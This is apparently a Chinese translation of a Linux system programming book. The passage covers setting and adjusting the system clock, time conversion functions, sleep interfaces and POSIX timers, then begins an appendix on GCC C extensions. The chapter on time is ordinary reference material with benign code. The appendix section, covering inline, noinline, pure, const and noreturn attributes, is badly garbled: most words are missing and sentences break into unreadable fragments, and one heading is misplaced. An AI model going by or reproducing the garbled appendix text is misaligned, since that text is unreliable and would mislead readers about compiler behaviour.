与 gettimeofday() 相对应的是 settimeofday():
#include <sys/time.h>
int settimeofday (const struct timeval *tv ,
const struct timezone *tz);
成功调用 settimeofday() 时,系统时间被设置为 tv 给出的值,并返回 0。和 gettimeofday() 一样,给 tz 传递 NULL 是最好的选择。失败时,调用返回 -1,并将 errno 设置为下列值之一:
EFAULT:tv 或 tz 指向非法内存。
EINVAL:提供的结构体中某个字段无效。
EPERM:调用进程没有 CAP_SYS_TIME 权限。
下面的例子将当前时间设置为 1970 年 12 月末的某个时刻:
struct timeval tv = { .tv_sec = 31415926,
.tv_usec = 27182818 };
int ret;
ret = settimeofday (&tv, NULL);
if (ret)
perror ("settimeofday");
10.5.2 设置时间的一个高级接口
正如 clock_gettime() 改进了 gettimeofday(),clock_settime() 也使 settimeofday() 显得过时了:
#include <time.h>
int clock_settime (clockid_t clock_id,
const struct timespec *ts);
成功时,调用返回 0,clock_id 指定的时间源被设置为 ts 指定的时间。失败时,调用返回 -1,并设置 errno 为下列值之一:
EFAULT:ts 是非法指针。
EINVAL:clock_id 不是本系统上合法的时间源。
EPERM:进程没有设置该时间源的相关权限,或者该时间源不能被设置。
在大多数系统上,唯一可以设置的时间源是 CLOCK_REALTIME。因此,这个函数相对于 settimeofday() 的唯一优势是提供了纳秒级精度(此外还不用处理无意义的 timezone 结构体)。
10.6 玩转时间
Unix 系统和 C 语言提供了一系列函数,用于在"分解时间"(broken-down time,即 tm 结构体)、ASCII 字符串表示的时间和 time_t 之间进行转换。asctime() 将 tm 结构体表示的分解时间转换为 ASCII 字符串:
#include <time.h>
char * asctime (const struct tm *tm);
char * asctime_r (const struct tm *tm, char *buf);
它返回一个指向静态分配的字符串的指针。之后对任何时间函数的调用都可能覆盖该字符串,因此 asctime() 不是线程安全的。
线程安全(而且设计得更好)的版本是 asctime_r()。调用者通过 buf 提供一个长度至少为 26 个字符的缓冲区,结果存入其中。
两个函数在出错时都返回 NULL。
mktime() 则把 tm 结构体转换为 time_t:
#include <time.h>
time_t mktime (struct tm *tm);
mktime() 还会通过 tzset(),将时区设置为 tm 指定的值。出错时,它返回 -1(强制转换为 time_t)。
ctime() 将 time_t 转换为 ASCII 表示形式:
#include <time.h>
char * ctime (const time_t *timep);
char * ctime_r (const time_t *timep, char *buf);
出错时,它返回 NULL。举个例子:
time_t t = time (NULL);
printf ("the time a mere line ago: %s", ctime (&t));
注意,ctime() 的返回结果中已经带有一个换行符,输出时不需要再额外换行,不过这可能有些不方便。
和 asctime() 一样,ctime() 返回指向静态字符串的指针,因此不是线程安全的。线程安全的版本 ctime_r() 在 buf 指向的缓冲区上工作,缓冲区长度至少要有 26 个字符。
gmtime() 将给出的 time_t 转换为 tm 结构体,以 UTC 时区的格式表示:
#include <time.h>
struct tm * gmtime (const time_t *timep);
struct tm * gmtime_r (const time_t *timep,
struct tm *result);
出错时,它们返回 NULL。
gmtime() 同样返回指向静态分配的结构体的指针,因此也不是线程安全的。线程安全的版本 gmtime_r() 在 result 指向的结构体上操作。
localtime() 和 localtime_r() 分别类似于 gmtime() 和 gmtime_r(),不过它们将给出的 time_t 表示为用户本地时区的时间:
#include <time.h>
struct tm * localtime (const time_t *timep);
struct tm * localtime_r (const time_t *timep,
struct tm *result);
和 mktime() 一样,调用 localtime() 也会调用 tzset(),初始化时区。localtime_r() 是否也执行这一步,标准没有规定。
difftime() 返回两个 time_t 值相差的秒数,并强制转换为 double:
#include <time.h>
double difftime (time_t time1, time_t time0);
在所有 POSIX 系统上,time_t 都是算术类型,因此 difftime() 相当于下面的表达式,只是它对减法溢出进行了检测:
(double) (time1 - time0)
在 Linux 上,由于 time_t 是整数类型,没有必要把它转换为 double。不过为了保证可移植性,最好还是使用 difftime()。
10.7 调校系统时钟
前面提到过随意设定墙钟时间的危险性,然而有些应用确实需要一种安全的方法来调整操作系统的绝对时间。最常见的例子是 make(根据 Makefile 的内容构建软件项目的程序)。每次执行 make 时,它并不会重新构建整个源码树,否则对于大型项目,哪怕一个文件的小改动都可能让重新编译花上数小时。make 的做法是比较源文件(比如 wolf.c)和目标文件(wolf.o)的时间戳:如果源文件,或者它依赖的任何文件(比如 wolf.h),比目标文件新,make 就重新编译源文件,生成更新的目标文件;反之,如果源文件不比目标文件新,则不做处理。
了解了这些,就能明白当用户发现时钟比正确时间慢了几个小时,并用 date 更新系统时间后,可能发生什么。如果用户更新并保存了 wolf.c,麻烦就来了:如果把当前时间往回调,wolf.c 就可能看起来比 wolf.o 旧(虽然事实并非如此),从而不会触发重新编译。
为避免这类问题,Unix 提供了 adjtime() 函数,调用者可以让系统以渐进的方式微调当前时间。网络时间协议(NTP)之类的后台守护进程经常这样做,它们周期性地修正时钟误差,并通过 adjtime() 尽量减小这些调整对系统的影响:
#define _BSD_SOURCE
#include <sys/time.h>
int adjtime (const struct timeval *delta,
struct timeval *olddelta);
成功调用 adjtime() 时,会指示内核按照 delta 逐渐调整时间,然后返回 0。如果 delta 指定的时间是正值,内核将在这段时间内加快系统时钟;如果是负值,内核将在这段时间内减慢系统时钟。内核进行这种渐进调整的方式,保证了时钟单调递增,而且不会有突然的跳变。即使 delta 为负,调整也不会把时钟往回调,而是让时钟走得慢一些,直到系统时间逐渐收敛到正确的时间。
如果 delta 为 NULL,内核停止处理之前注册的所有修正;但对已经完成的那部分调整,内核将予以保留。如果 olddelta 非 NULL,之前注册但尚未完成的修正量会被写入该 timeval 结构体。因此,将 delta 设为 NULL 并将 olddelta 设为合法指针,就可以获知正在进行的修正。
adjtime() 进行的调整应当是微小的,理想的例子就是前面提到的 NTP,每次只调整几秒。Linux 对单次调整的最小和最大阈值都有限制。
出错时,adjtime() 返回 -1,并设置 errno 为下列值之一:
EFAULT:delta 或 olddelta 是非法指针。
EINVAL:delta 指定的调整量过大或过小。
EPERM:调用者没有 CAP_SYS_TIME 权限。
RFC 1305 定义了一个比 adjtime() 的渐进调整方法更强大、也更复杂的时钟调整算法。Linux 用 adjtimex() 系统调用实现了该算法:
#include <sys/timex.h>
int adjtimex (struct timex *adj);
调用 adjtimex(),可以将内核中与时间相关的参数读入 adj 指向的 timex 结构体中。此外,系统调用还可以根据该结构体的 modes 字段,有选择地设置某些参数。
头文件 <sys/timex.h> 中定义了 timex 结构体:
struct timex {
int modes; /* mode selector */
long offset; /* time offset (usec) */
long freq; /* frequency offset (scaled ppm) */
long maxerror; /* maximum error (usec) */
long esterror; /* estimated error (usec) */
int status; /* clock status */
long constant; /* PLL time constant */
long precision; /* clock precision (usec) */
long tolerance; /* clock frequency tolerance
(ppm) */
struct timeval time; /* current time */
long tick; /* usecs between clock ticks */
};
modes 字段的取值是零个或多个下列标志按位或的结果:
ADJ_OFFSET:通过 offset 设置时间偏移量。
ADJ_FREQUENCY:通过 freq 设置频率偏移量。
ADJ_MAXERROR:通过 maxerror 设置最大误差值。
ADJ_ESTERROR:通过 esterror 设置估计误差值。
ADJ_STATUS:通过 status 设置时钟状态。
ADJ_TIMECONST:通过 constant 设置锁相环(PLL)时间常量。
ADJ_TICK:通过 tick 设置时钟滴答值。
ADJ_OFFSET_SINGLESHOT:通过 offset 设置一次简单的时间偏移调整(类似 adjtime())。
如果 modes 是 0,则不设置任何值。只有拥有 CAP_SYS_TIME 权限的用户才能给 modes 传递非零值;任何用户都可以将 modes 设为 0,以此查询全部参数,但不能设置任何值。
成功时,adjtimex() 返回当前的时钟状态,取值如下:
TIME_OK:时钟已同步。
TIME_INS:将插入一个闰秒。
TIME_DEL:将删除一个闰秒。
TIME_OOP:闰秒正在进行中。
TIME_WAIT:闰秒刚刚结束。
TIME_BAD:时钟未同步。
失败时,adjtimex() 返回 -1,并设置 errno 为下列值之一:
EFAULT:adj 是非法指针。
EINVAL:modes、offset 或 tick 中一个或多个字段非法。
EPERM:modes 非零,但调用者没有 CAP_SYS_TIME 权限。
adjtimex() 系统调用是 Linux 特有的。关心可移植性的应用程序应当优先使用 adjtime()。
RFC 1305 定义的算法十分复杂,对 adjtimex() 的完整讨论超出了本书的范围。想了解更多信息,请参考该 RFC。
10.8 睡眠和等待
有各种函数能让进程睡眠(阻塞)指定的一段时间。最简单的是 sleep(),它让发起调用的进程睡眠 seconds 指定的秒数:
#include <unistd.h>
unsigned int sleep (unsigned int seconds);
该调用返回未睡到的秒数。成功的调用返回 0;但如果睡眠被信号打断,函数也可能返回 0 到 seconds 之间的某个值(此时不会设置 errno)。通常,使用 sleep() 的进程并不真正在乎实际睡了多久:
sleep (7); /* sleep seven seconds */
如果确实想保证进程至少睡满指定的时间,可以根据返回值继续调用 sleep(),直到它返回 0:
unsigned int s = 5;
/* sleep five seconds: no ifs, ands, or buts
about it */
while ((s = sleep (s)))
;
10.8.1 微秒级精度睡眠
以整秒为单位的睡眠,粒度实在太粗了。在现代操作系统上,一秒钟太久了,所以程序经常需要以亚秒级的精度睡眠。usleep() 可以做到这一点:
/* BSD version */
#include <unistd.h>
void usleep (unsigned long usec);
/* SUSv2 version */
#define _XOPEN_SOURCE 500
#include <unistd.h>
int usleep (useconds_t usec);
10.8.2 Linux 的实时支持
成功调用 usleep(),可以使发起调用的进程睡眠 usec 微秒。不幸的是,BSD 和 Single UNIX Specification(单一 UNIX 规范)在该函数的原型上存在分歧。BSD 版本接受 unsigned long 类型的参数;而 SUS 版本的 usleep() 接受 useconds_t 类型的参数。如果定义 _XOPEN_SOURCE 为 500 或更大的值,Linux 遵循 SUS 版本;如果 _XOPEN_SOURCE 未定义,或者设置的值小于 500,Linux 遵循 BSD 版本。
SUS 版本在成功时返回 0,出错时返回 -1。合法的 errno 值有两个:睡眠被信号打断时为 EINTR;usecs 太大时为 EINVAL(在 Linux 上,该类型的全部取值范围都是合法的,所以不会出现 EINVAL 错误)。
根据 SUS 规范,useconds_t 类型最大能支持 1,000,000 的值。
鉴于不同版本之间原型的分歧,以及某些 Unix 系统可能不支持 useconds_t 类型,不显式使用该类型可以增强可移植性。为了尽可能可移植,最好假设 usleep() 的原型是:
void usleep (unsigned int usec);
这样使用:
unsigned int usecs = 200;
usleep (usecs);
对于该函数的另一个版本,也可以用下面的方式检测错误:
errno = 0;
usleep (1000);
if (errno)
perror ("usleep");
不过对大多数程序来说,它们并不检查、也不关心 usleep() 的错误。
10.8.3 纳秒级精度睡眠
Linux 提供了比 usleep() 功能更强大的 nanosleep(),它能提供纳秒级精度:
#define _POSIX_C_SOURCE 199309
#include <time.h>
int nanosleep (const struct timespec *req,
struct timespec *rem);
成功调用 nanosleep() 时,进程睡眠 req 指定的时间,然后返回 0。出错时,调用返回 -1,并设置 errno 为相应的值。如果信号打断了睡眠,调用可以在指定时间到达之前返回:此时 nanosleep() 返回 -1,并设置 errno 为 EINTR。如果 rem 非 NULL,函数还会把剩余的睡眠时间(req 中没有睡到的部分)存入 rem。之后,程序可以重新发起调用,把 rem 作为参数传给 req(如本节后面的例子所示)。
下面是其他合法的 errno 值:
EFAULT:req 或 rem 是非法指针。
EINVAL:req 中某个字段非法。
一般情况下,用法很简单:
struct timespec req = { .tv_sec = 0,
.tv_nsec = 200 };
/* sleep for 200 ns */
ret = nanosleep (&req, NULL);
if (ret)
perror ("nanosleep");
下面是睡眠被打断后继续睡眠的例子:
struct timespec req = { .tv_sec = 0,
.tv_nsec = 1369 };
struct timespec rem;
int ret;
/* sleep for 1369 ns */
retry:
ret = nanosleep (&req, &rem);
if (ret) {
if (errno == EINTR) {
/* retry, with the provided time
remaining */
req.tv_sec = rem.tv_sec;
req.tv_nsec = rem.tv_nsec;
goto retry;
}
perror ("nanosleep");
}
另一种方法(可能更高效,但可读性差一些)是利用指针交换,达到同样的效果:
struct timespec req = { .tv_sec = 1,
.tv_nsec = 0 };
struct timespec rem, *a = &req, *b = &rem;
/* sleep for 1s */
while (nanosleep (a, b) && errno == EINTR) {
struct timespec *tmp = a;
a = b;
b = tmp;
}
和 sleep()、usleep() 相比,nanosleep() 有以下优点:
• 提供纳秒级精度,而另外两者只能提供秒或微秒级精度。
• 它是 POSIX.1b 标准的一部分。
• 它不是用信号实现的(这种实现方法的弊端稍后讨论)。
尽管有不推荐使用的警告,许多程序还是更愿意使用 sleep() 或 usleep() 而不是 nanosleep()。由于 nanosleep() 是 POSIX 标准,并且不使用信号,新程序最好使用它(或者下一节将讨论的接口),而不要使用 sleep() 或 usleep()。
10.8.4 实现睡眠的高级方法
除了相对于当前实际时间睡眠,我们还可以相对某个指定的时间源睡眠。POSIX 为此提供了 clock_nanosleep():
#include <time.h>
int clock_nanosleep (clockid_t clock_id,
int flags,
const struct timespec *req,
struct timespec *rem);
clock_nanosleep() 的行为类似于 nanosleep()。实际上,下面的调用:
ret = nanosleep (&req, &rem);
等价于这个调用:
ret = clock_nanosleep (CLOCK_REALTIME, 0, &req,
&rem);
两者的区别在于 clock_id 和 flags 参数。前者指定了用来测量的时间源。大多数时间源都是合法的,但不能指定调用进程的 CPU 时钟(例如 CLOCK_PROCESS_CPUTIME_ID):这样做没有任何意义,因为睡眠期间进程被挂起,进程时间不会增加。
应该使用哪个时间源,取决于程序睡眠的目的。如果要睡到某个绝对时间值,CLOCK_REALTIME 是最好的选择;如果要睡眠一段相对的时间,CLOCK_MONOTONIC 无疑是理想的时间源。
flags 参数是 TIMER_ABSTIME 或 0。如果是 TIMER_ABSTIME,req 指定的是一个绝对时间值。这种处理解决了一个潜在的竞争条件。为了说明该参数的价值,假设进程处于时间 T0,想要睡眠到时间 T1。在 T0 时,进程调用 clock_gettime() 获取当前时间(T0);然后用 T1 减去 T0,得到差值 Y,传递给 clock_nanosleep()。但是,在获取时间和进程进入睡眠之间,总会经过一些时间。更糟的是,如果进程在这个间隙被调度出去、发生缺页异常,或者遇到类似情况,我们几乎无能为力:在获取当前时间、计算差值和实际睡眠之间,存在竞争条件。
TIMER_ABSTIME 标志允许进程直接指定 T1,从而避开了竞争。在指定时间源的时间到达 T1 之前,内核一直挂起该进程;如果指定时间源的当前时间已经超过 T1,调用立即返回。
我们分别看一下相对睡眠和绝对睡眠。下面的例子让进程睡眠 1.5 秒:
struct timespec ts = { .tv_sec = 1, .tv_nsec =
500000000 };
int ret;
ret = clock_nanosleep (CLOCK_MONOTONIC, 0, &ts,
NULL);
if (ret)
perror ("clock_nanosleep");
而下面这个相对复杂的例子则睡眠到某个绝对时间,这里是 clock_gettime() 针对 CLOCK_MONOTONIC 时间源返回的当前时间之后整整一秒:
struct timespec ts;
int ret;
/* we want to sleep until one second from NOW */
ret = clock_gettime (CLOCK_MONOTONIC, &ts);
if (ret) {
perror ("clock_gettime");
return;
}
ts.tv_sec += 1;
printf ("We want to sleep until sec=%ld nsec=%ld\n",
ts.tv_sec, ts.tv_nsec);
ret = clock_nanosleep (CLOCK_MONOTONIC,
TIMER_ABSTIME,
&ts, NULL);
if (ret)
perror ("clock_nanosleep");
大多数程序只需要相对睡眠,因为它们的睡眠要求并不严格。然而,某些实时进程对时间的要求相当严格,需要绝对睡眠,以避免产生潜在破坏性后果的竞争条件。
10.8.5 sleep 的一种可移植实现
如何实现可移植的亚秒级睡眠?答案是我们前面提到过的 select():
#include <sys/select.h>
int select (int n,
fd_set *readfds,
fd_set *writefds,
fd_set *exceptfds,
struct timeval *timeout);
在很长一段时间里,select() 提供的超时机制是实现亚秒级睡眠的唯一可移植方法。关注可移植性的 Unix 程序员曾经陷入困境:sleep() 无法满足亚秒级睡眠的需求,usleep() 在各系统上的实现参差不齐,而 nanosleep() 还没有问世。后来他们发现,给 select() 的 n 传递 0,给三个 fd_set 指针都传递 NULL,并把需要睡眠的时间传给 timeout,就有了一种可移植且高效的方法让进程睡眠:
struct timeval tv = { .tv_sec = 0,
.tv_usec = 757 };
/* sleep for 757 us */
select (0, NULL, NULL, NULL, &tv);
如果需要兼容较老的 Unix 系统,考虑到可移植性,select() 可能是最好的选择。
10.8.6 超限
前面讨论的所有接口都保证进程至少睡眠指定的时间(或者返回错误来通知)。睡眠的进程绝不会在指定时间到达之前成功返回。但存在另一种可能:实际睡眠的时间会超过指定的时间。
这种现象可以用简单的调度行为来解释:指定的时间到了,内核可能会及时唤醒进程,但调度器可能不会立刻选中它运行。
然而,还可能存在一个更隐蔽的原因:定时器超限(timer overruns)。当定时器的粒度大于请求的时间间隔时,就会发生超限。举例来说,假设系统时钟每 10 毫秒产生一次滴答,而进程请求 1 毫秒的睡眠。系统只能以 10 毫秒的精度测量时间并响应相关的事件(比如唤醒进程)。如果进程发起睡眠请求时,距离下一次滴答恰好还有 1 毫秒,一切正常:请求的时间(1 毫秒)过后,滴答到来,内核唤醒进程。然而,如果进程发起请求时,定时器刚好完成一次滴答,那么接下来的 10 毫秒内都不会再有滴答。于是,进程会多睡 9 毫秒!也就是说,发生了 9 毫秒的超限。平均来说,周期为 X 的定时器会产生 X/2 的超限。
使用 POSIX 时钟那样的高精度时间源,或者提高 HZ 值,可以减小定时器超限。
10.8.7 替代睡眠
如果可以的话,应尽量避免使用睡眠。通常这很难做到,但问题不大,因为短暂的睡眠占用的时间微乎其微。不过,要当心那些靠循环睡眠来等待事件发生的糟糕设计。让进程阻塞在文件描述符上,由内核负责处理唤醒,比让进程自己周期性地醒来检查要好得多:内核能让进程一直睡眠,直到事件真正发生时才唤醒它。
10.9 定时器
定时器提供了在一定时间过去后通知进程的机制。定时器超时(到期)所需的时间,称为延迟时间(delay)或者超期时间(expiration)。内核通知进程定时器已到期的方式,与定时器的类型有关。Linux 内核提供了几种定时器,我们稍后将一一讨论。
定时器在很多场合都非常有用,例如每秒刷新 60 次屏幕,或者在某个阻塞操作持续 500 毫秒后取消它。
10.9.1 简单的闹钟
alarm() 是最简单的定时器接口:
#include <unistd.h>
unsigned int alarm (unsigned int seconds);
成功调用该函数后,在真实时间(real time)seconds 秒之后,内核会将 SIGALRM 信号发给调用进程。如果先前设置的闹钟尚未触发,本次调用会取消它,用新的闹钟代替旧的,并返回先前那个闹钟剩余的秒数。如果 seconds 是 0,则只取消之前的闹钟,不设置新的闹钟。
要成功使用该函数,还需要为 SIGALRM 信号注册一个信号处理程序。(信号和信号处理程序的内容已在前面的章节讨论过。)下面的代码段注册了一个 SIGALRM 处理程序 alarm_handler(),并设置了一个 5 秒钟的闹钟:
void alarm_handler (int signum)
{
printf ("Five seconds passed!\n");
}
void func (void)
{
signal (SIGALRM, alarm_handler);
alarm (5);
pause ();
}
10.9.2 间歇定时器
间歇定时器系统调用最早出现于 4.2BSD,如今已是 POSIX 标准,它可以提供比 alarm() 更多的控制:
#include <sys/time.h>
int getitimer (int which,
struct itimerval *value);
int setitimer (int which,
const struct itimerval *value,
struct itimerval *ovalue);
间歇定时器和 alarm() 的操作方式类似,但它能够自动重启自己,并在以下三种独立的模式之一下工作:
ITIMER_REAL:测量真实时间。当指定的真实时间流逝后,内核将 SIGALRM 信号发给进程。
ITIMER_VIRTUAL:只在进程用户空间的代码运行时减少计数。当指定的进程时间流逝后,内核将 SIGVTALRM 发给进程。
ITIMER_PROF:在进程执行,以及内核为进程服务时(例如完成一个系统调用)都减少计数。当指定的时间流逝后,内核将 SIGPROF 信号发给进程。该模式一般和 ITIMER_VIRTUAL 共用,这样程序就能分别统计进程消耗的用户时间和内核时间。
ITIMER_REAL 测量的时间和 alarm() 相同;另外两种模式主要用于剖析(profiling)程序。
itimerval 结构体允许用户设置定时器的到期时限,以及到期后是否重启:
struct itimerval {
struct timeval it_interval; /* next value */
struct timeval it_value; /* current value */
};
它又用到了前面介绍过的 timeval 结构体:
struct timeval {
long tv_sec; /* seconds */
long tv_usec; /* microseconds */
};
setitimer() 设置一个到期时间为 it_value 的定时器。一旦时限超过 it_value,内核就用 it_interval 指定的时长重启定时器。也就是说,当 it_value 减到 0 时,定时间隔被重新设置为 it_interval;如果 it_interval 是 0,定时器到期后就不再重启。类似地,如果把一个活动定时器的 it_value 设置为 0,定时器就会停止,并且不再重启。
如果 ovalue 非 NULL,则 which 类型的间歇定时器的前一个值会被返回。
getitimer() 返回 which 类型的间歇定时器的当前值。
两个函数成功时都返回 0,出错时返回 -1,并设置 errno 为下列值之一:
EFAULT:value 或 ovalue 是非法指针。
EINVAL:which 不是合法的间歇定时器类型。
下面的代码段注册了一个 SIGALRM 信号处理程序(参见前面的章节),并将间歇定时器的初始到期时间设置为 5 秒,随后的间隔设置为 1 秒:
void alarm_handler (int signo)
{
printf ("Timer hit!\n");
}
void foo (void) {
struct itimerval delay;
int ret;
signal (SIGALRM, alarm_handler);
delay.it_value.tv_sec = 5;
delay.it_value.tv_usec = 0;
delay.it_interval.tv_sec = 1;
delay.it_interval.tv_usec = 0;
ret = setitimer (ITIMER_REAL, &delay, NULL);
if (ret) {
perror ("setitimer");
return;
}
pause ( );
}
一些 Unix 系统通过 SIGALRM 实现了 sleep() 和 usleep()。显然,alarm() 和 setitimer() 也使用了 SIGALRM。因此,程序员必须小心,不要重叠调用这些函数:重叠调用的结果是未定义的。如果只需要等待很短的时间,程序应该使用 nanosleep(),POSIX 标准保证它不使用信号。如果需要定时器,程序应该使用 setitimer() 或 alarm()。
10.9.3 高级定时器
最强大的定时器接口,毫无疑问来自 POSIX 的时钟函数族。基于 POSIX 时钟的定时器,用 timer_create() 创建定时器,用 timer_settime() 初始化定时器,用 timer_delete() 销毁它。
POSIX 的定时器接口无疑是最先进的,但也是最新的(因此可移植性相对较差),同时也是使用上最复杂的。如果追求简单或可移植性,setitimer() 是更好的选择。
10.9.3.1 建立一个定时器
timer_create() 创建一个定时器:
#include <signal.h>
#include <time.h>
int timer_create (clockid_t clockid,
struct sigevent *evp,
timer_t *timerid);
成功调用 timer_create() 时,会创建一个与 POSIX 时钟 clockid 相关联的新定时器,在 timerid 中存放定时器的唯一标识,并返回 0。该调用仅仅是建立了运行定时器的条件;在被实际设置(见下一节)之前,定时器不会做任何事情。
下面的例子在 POSIX 时钟 CLOCK_PROCESS_CPUTIME_ID 上创建一个新的定时器,并将定时器 ID 存入 timer 中:
timer_t timer;
int ret;
ret = timer_create (CLOCK_PROCESS_CPUTIME_ID,
NULL,
&timer);
if (ret)
perror ("timer_create");
出错时,调用返回 -1,timerid 的值未定义,并且调用会设置 errno 为下列值之一:
EAGAIN:系统缺少足够的资源来完成该请求。
EINVAL:clockid 指定的 POSIX 时钟非法。
ENOTSUP:clockid 指定的 POSIX 时钟合法,但系统不支持将它用作定时器的时钟。POSIX 保证所有实现都支持把 CLOCK_REALTIME 时钟用作定时器时钟;其他时钟是否支持,取决于具体实现。
evp 参数(当其非 NULL 时)定义了定时器到期时的异步通知方式。头文件 <signal.h> 定义了该结构体。它的内容对程序员来说本应是不透明的,但至少包含以下字段:
#include <signal.h>
struct sigevent {
union sigval sigev_value;
int sigev_signo;
int sigev_notify;
void (*sigev_notify_function)(union sigval);
pthread_attr_t *sigev_notify_attributes;
};
union sigval {
int sival_int;
void *sival_ptr;
};
这个结构体定义了 POSIX 定时器到期时,内核应当如何通知进程。在传统信号机制之上,它还提供了更强大的能力:除了向进程发送信号,内核甚至可以在定时器到期时创建一个新线程,完成相应的工作。进程在定时器到期时的行为由 sigev_notify 指定,取值是以下三者之一:
SIGEV_NONE:"空"通知。定时器到期时,什么也不做。
SIGEV_SIGNAL:定时器到期时,内核给进程发送 sigev_signo 指定的信号。在信号处理程序中,si_value 被设置为 sigev_value。
SIGEV_THREAD:定时器到期时,内核创建一个新线程(在该进程内),让它执行 sigev_notify_function,并将 sigev_value 作为它唯一的参数。该线程在这个函数返回时终止。如果 sigev_notify_attributes 非 NULL,它指定的 pthread_attr_t 结构体定义了新线程的行为。
在前面的例子中,evp 是 NULL,定时器的到期通知按如下默认方式设置:sigev_notify 为 SIGEV_SIGNAL,sigev_signo 为 SIGALRM,sigev_value 为定时器的 ID。也就是说,这些定时器默认以类似 POSIX 间歇定时器的方式进行通知。然而,通过自定义,它们可以完成更复杂的工作!
下面的例子基于 CLOCK_REALTIME 创建一个定时器。定时器到期时,内核发出 SIGUSR1 信号,并把 si_value 设置为保存定时器 ID 的变量地址:
struct sigevent evp;
timer_t timer;
int ret;
evp.sigev_value.sival_ptr = &timer;
evp.sigev_notify = SIGEV_SIGNAL;
evp.sigev_signo = SIGUSR1;
ret = timer_create (CLOCK_REALTIME,
&evp,
&timer);
if (ret)
perror ("timer_create");
10.9.4 设置定时器
timer_create() 创建的定时器是未被设置的。可以用 timer_settime() 将其与一个到期时间关联并开始计时:
#include <time.h>
int timer_settime (timer_t timerid,
int flags,
const struct itimerspec *value,
struct itimerspec *ovalue);
成功调用 timer_settime() 时,会将 timerid 指定的定时器的到期时间设置为 value,value 是一个 itimerspec 结构体:
struct itimerspec {
struct timespec it_interval; /* next value */
struct timespec it_value; /* current value */
};
和 setitimer() 一样,it_value 指定了定时器当前的到期时限。定时器到期时,内核会用 it_interval 指定的值更新 it_value。如果 it_interval 是 0,定时器就不是间歇定时器,在 it_value 到期后即停止运行。
和前面介绍的 timeval 不同,这里用到的 timespec 结构体可以提供纳秒级精度:
struct timespec {
time_t tv_sec; /* seconds */
long tv_nsec; /* nanoseconds */
};
如果 flags 是 TIMER_ABSTIME,value 指定的时间是绝对时间(与默认的相对当前时间的解释相反)。这种修正过的操作方式,可以避免在获取当前时间、计算该时间与期望到期时间的相对差值、设置定时器的过程中产生竞争条件。细节可以参考前面"实现睡眠的高级方法"一节。
如果 ovalue 非 NULL,定时器之前的到期时间将被存入它指向的 itimerspec 中。如果定时器之前未被设置,结构体的成员将全部被置 0。
使用前面用 timer_create() 初始化的 timer 值,下面的例子创建了一个每秒都到期一次的周期定时器:
struct itimerspec ts;
int ret;
ts.it_interval.tv_sec = 1;
ts.it_interval.tv_nsec = 0;
ts.it_value.tv_sec = 1;
ts.it_value.tv_nsec = 0;
ret = timer_settime (timer, 0, &ts, NULL);
if (ret)
perror ("timer_settime");
10.9.4.1 取得定时器的过期时间
可以在任何时刻,用 timer_gettime() 获取一个定时器的到期时间而不必重新设置它:
#include <time.h>
int timer_gettime (timer_t timerid,
struct itimerspec *value);
成功调用 timer_gettime() 时,会将 timerid 指定的定时器的到期时间存入 value 指向的结构体中,并返回 0。失败时,调用返回 -1,并设置 errno 为下列值之一:
EFAULT:value 是非法指针。
EINVAL:timerid 不是合法的定时器。
举个例子:
struct itimerspec ts;
int ret;
ret = timer_gettime (timer, &ts);
if (ret)
perror ("timer_gettime");
else {
printf ("current sec=%ld nsec=%ld\n",
ts.it_value.tv_sec, ts.it_value.tv_nsec);
printf ("next sec=%ld nsec=%ld\n",
ts.it_interval.tv_sec,
ts.it_interval.tv_nsec);
}
10.9.4.2 取得定时器的超时值
POSIX 定义了一个接口,用于获取给定定时器的超限次数:
#include <time.h>
int timer_getoverrun (timer_t timerid);
成功时,timer_getoverrun() 返回定时器初次到期与实际通知进程(例如信号真正送达)之间额外发生的超限次数。比方说,在我们前面的例子里,一个 1 毫秒的定时器运行了 10 毫秒,调用就返回 9。如果超限的次数大于等于 DELAYTIMER_MAX,调用就返回 DELAYTIMER_MAX。
失败时,该函数返回 -1,并设置 errno 为 EINVAL,这个唯一的错误码表示 timerid 指定的定时器非法。
举个例子:
int ret;
ret = timer_getoverrun (timer);
if (ret == -1)
perror ("timer_getoverrun");
else if (ret == 0)
printf ("no overrun\n");
else
printf ("%d overrun(s)\n", ret);
10.9.4.3 删除定时器
删除一个定时器很简单:
#include <time.h>
int timer_delete (timer_t timerid);
成功调用 timer_delete() 时,会销毁 timerid 指定的定时器,并返回 0。失败时,调用返回 -1,并设置 errno 为 EINVAL,这个唯一的错误码表示 timerid 不是合法的定时器。
附录 A
GCC 对 C 语言的扩展
GCC(GNU 集, GNU Compiler Collection C 提扩
展能的扩展能对程。提的
C 能扩展提的能的
。以更效的。扩展对 C
的的调方。
新的 C —ISO C99 GCC 提的扩展能。
扩展能 C99 的扩展能 ISO C99
同的实。新写的 ISO C99 。我们提
及扩展 GCC 的扩展能。
A.1 GNU C
GCC 的 C GNU C 。 90 GNU C
C 的提、零、内、
能。的展 C ISO C99
GNU C 的扩展新的。然 GNU C 提的性
Linux 程 C90 或 C99 的然 GNU C 的
性(扩展能。
的 GCC 扩展的子 Linux 的内内 GNU
C。 Intel 对 Intel C (ICC, Intel C Compiler) 进
ICC 能理 (Linux) 内的 GNU C 扩展。扩展
GCC 。
A.2 内联函数
将内(inline将的段
的调。将存调时
。处理以调的以调进
能的(能将调调进。
的调时时效。然将
调的方然。小单或
调的时以将内。
GCC inline inline 示将进
内。 C99 inline
static inline int foo (void) { /* ... */ }
上 inline 提示对进内
。 GCC 上提扩展能以将进内
方
static inline __attribute__ ((always_inline)) int foo (void) { /* ... */ }
内的的处理(preprocessor macro。 GCC
的内的以进。的
#define max(a,b) ({ a > b ? a : b; })
以以的内
static inline int max (int a, int b)
{
if (a > b)
return a;
return b;
}
程内。的 x86 上
调的的。的内。
A.3 禁用内联
式 GCC 自内的对进内
。的处理方式时程能出内
工作。__builtin_return_address 时(
内能。 noinline 以内
__attribute__ ((noinline)) int foo (void) { /* ... */ }
A.4 纯函数
何的映的或
(nonvolatile的。对或的读的。对
以进(loop optimization子式(subexpression
elimination。 pure
__attribute__ ((pure)) int foo (int val) { /*
... */ }
的子 strlen() 。相同的调
的以提出调即。
以
/* 逐个字符地将 p 以大写形式打印 */
for (i = 0; i < strlen (p); i++)
printf ("%c", toupper (p[i]));
strlen() 能调
的程写(将 strlen() 单
处理
size_t len;
len = strlen (p);
for (i = 0; i < len; i++)
printf ("%c", toupper (p[i]));
更的程(的读能
while (*p)
printf ("%c", toupper (*p++));
的的能 void
的何的。
A.5 常函数
” ” 更的单。能将
作。的映以的方式进的。
的方式对以进。 abs()
的(进存或的小
作。 const
__attribute__ ((const)) int foo (void) { /*
... */ }
void 的。
A.6 不返回的函数
(调 exit())程以 noreturn
以
__attribute__ ((noreturn)) void foo (int
val) { /* ... */ }
